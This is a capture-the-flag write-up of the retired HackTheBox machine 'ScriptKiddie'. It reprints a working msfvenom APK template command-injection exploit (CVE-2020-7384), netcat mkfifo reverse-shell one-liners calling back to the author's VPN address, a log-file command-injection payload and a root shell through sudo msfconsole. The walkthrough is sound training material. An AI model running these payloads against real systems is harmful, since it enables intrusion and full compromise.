HacktheBox -ScriptKiddie - Retired

HacktheBox -ScriptKiddie - Retired

Recon

As is normal I started off with a threader3000 scan of the IP address.

We show 2 ports open 22 and 5000

Using threader to launch nmap on just those ports comes back with these results.

Nmap scan report for 10.10.10.226 Host is up (0.060s latency). PORT     STATE SERVICE VERSION 22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) |   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) |_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) 5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.09 seconds ------------------------------------------------------------ Combined scan completed in 0:01:43.278542

Let's check out port 5000

Looks like a page that can query searchsploit, run nmap scans and generate msfvenom payloads.

I tried playing with the nmap & seachsploit functions to see if  I could insert some other code to run commands on the box without success. So let's pivot to  the payloads function.

I've never used a template to make a msfvenom payload before so that is intriguing.

Just a quick google search for msvenom template, and we see this interesting result.

https://www.exploit-db.com/exploits/49491

Here is a good writeup about the nuts and bolts of this RCE.

https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md

Looks like this is a python script for inserting a payload inside of a template file.

# Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection # Exploit Author: Justin Steven # Vendor Homepage: https://www.metasploit.com/ # Software Link: https://www.metasploit.com/ # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0 # CVE : CVE-2020-7384 #!/usr/bin/env python3 import subprocess import tempfile import os from base64 import b64encode # Change me payload = 'echo "Code execution as $(id)" > /tmp/win' # b64encode to avoid badchars (keytool is picky) payload_b64 = b64encode(payload.encode()).decode() dname = f"CN='|echo {payload_b64} | base64 -d | sh #" print(f"[+] Manufacturing evil apkfile") print(f"Payload: {payload}") print(f"-dname: {dname}") print() tmpdir = tempfile.mkdtemp() apk_file = os.path.join(tmpdir, "evil.apk") empty_file = os.path.join(tmpdir, "empty") keystore_file = os.path.join(tmpdir, "signing.keystore") storepass = keypass = "password" key_alias = "signing.key" # Touch empty_file open(empty_file, "w").close() # Create apk_file subprocess.check_call(["zip", "-j", apk_file, empty_file]) # Generate signing key with malicious -dname subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname]) # Sign APK using our malicious dname subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias]) print() print(f"[+] Done! apkfile is at {apk_file}") print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")

Let's see if we can get this to work.

Exploit

First for just POC, I'm going to try and have the box ping my VPN ip of 10.10.14.2

An error about no jarsigner… because kali doesn't ship with the jdk… let's install that

sudo apt install -y default-jdk

You might also notice ( my VPN ip address changed after this) so I modfied the script again.

Then generate the apk payload

Now we need to change the options for msfvenom on the website to Andriod so we can upload this apk.. And we can put anything we want for the IP address.

Then browse to the apk…. But before we do this let's set up a tcpdump listener to see if we do get pings back.

sudo tcpdump -i tun0 -n icmp     

So listen to TCP traffic on on VPN (tun0) interface and only tell us about ICMP 

Now if we click generate.

We get pings back, so we have POC (Proof of concept) working for this exploit.

Now let's modify it to get back a shell instead.

This step took me a couple minutes, I couldn't get the standard NC or mkfifo shell to work…

So I made an APK to grab the passwd file.

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false kid:x:1000:1000:kid:/home/kid:/bin/bash pwn:x:1001:1001::/home/pwn:/bin/bash

I noticed the users were setup to use /bin/bash and not /bin/sh ( which is what I was trying with my reverse shells)

I modified the last one I was working with mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f

Made the apk, uploaded it and…….

We got our foothold shell!!

For grins and giggles I looked at the kids python for the site.

And there is a regex filter for only allowing ip address in the nmap function.

And a regex filter to only allow alpha numeric in the searchsploit function.

regex_ip = re.compile(r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$') regex_alphanum = re.compile(r'^[A-Za-z0-9 \.]+$')

That little scamp.

He is also writing out failed attempts to a log file on just the searchsploit function.

def searchsploit(text, srcip):     if regex_alphanum.match(text):         result = subprocess.check_output(['searchsploit', '--color', text])         return render_template('index.html', searchsploit=result.decode('UTF-8', 'ignore'))     else:         with open('/home/kid/logs/hackers', 'a') as f:             f.write(f'[{datetime.datetime.now()}] {srcip}\n')         return render_template('index.html', sserror="stop hacking me - well hack you back")

But that log file is empty

Poking around /home there is another user named pwn that we have some access to

There is a file name scanlosers.sh

cat ./scanlosers.sh #!/bin/bash log=/home/kid/logs/hackers cd /home/pwn/ cat $log | cut -d' ' -f3- | sort -u | while read ip; do     sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" & done if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Looks like he is reading from that log and runs an nmap scan against the people who made their way into the logs :)

It's a weird setup though…. A script running from /home/pwn that is calling a log file in /home/kid

I wonder if there is a cron job that runs that script to "AutoPWN" the "hackers"

What happens if you put something in that empty file? Let's start again with a POC of a ping to see if we can get it working.

We need to be careful here, to inject where we want to inject the we need to pay close attention to this part in the scanlosers.sh file

cut -d' ' -f3-  

We want our injection to be the third field delimited by spaces.

Let's make a file called POC to play with to make sure we get this right

echo 1 2 EVILCODE > POC

Let's run the exact cut command on our file to see if it grabs the EVILCODE part

cat POC | cut -d' ' -f3-

Great so we know we need to put our command behind a couple of values separated by spaces.

So something like this

echo "1 2 ;/bin/bash -c 'ping -c 4 10.10.14.14'" >> /home/kid/logs/hackers

Let's run tcpdump again to make sure we can see the pings coming in.

And we can see we did get our pings back.

Now we should be able to just modify our POC with a reverse shell

Let's start a nc listener on port 4444

nc -lnvp 4444

Since the mkfifo Reverse shell worked on the initial connection for us let's use it again and just change the port number

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'" >> /home/kid/logs/hackers

and

We caught a shell

But it's a broken shell and doesn't do anything. I wonder if it has something to do with the field not being delimited with a space at the end? Let's just try adding a couple spaces to the end of our command before we write it to a file.

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'  " >> /home/kid/logs/hackers

Same thing maybe there needs to be another character there to denote another field?

echo "1 2 ;/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 4444 >/tmp/f'  circusmonkey" >> /home/kid/logs/hackers

This finally got back a good working shell!

One of the first things to check when doing priv escelcation and landing as a new user is their sudo permissions

sudo -l

Pwn can run msfconsole as root with no root password needed.

I don't know if you know this… but I'm going to drop a little knowledge here… you can run any linux command from the msfconsole as the user. Id ,ifconfig, chmod… literally anything you want to.

We can simply cat out our flag from here

cat /root/root.txt

But just reading a flag isn't good enough… We want to completely own this box.

It's pretty trivial at this point we can use mkfifo again from the msfconsole to land another reverse shell with nc

Start another listener

nc -lnvp 5566

Then drop a new mkfifo in the msfconsole

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5566 >/tmp/f

And we are in as root with full access…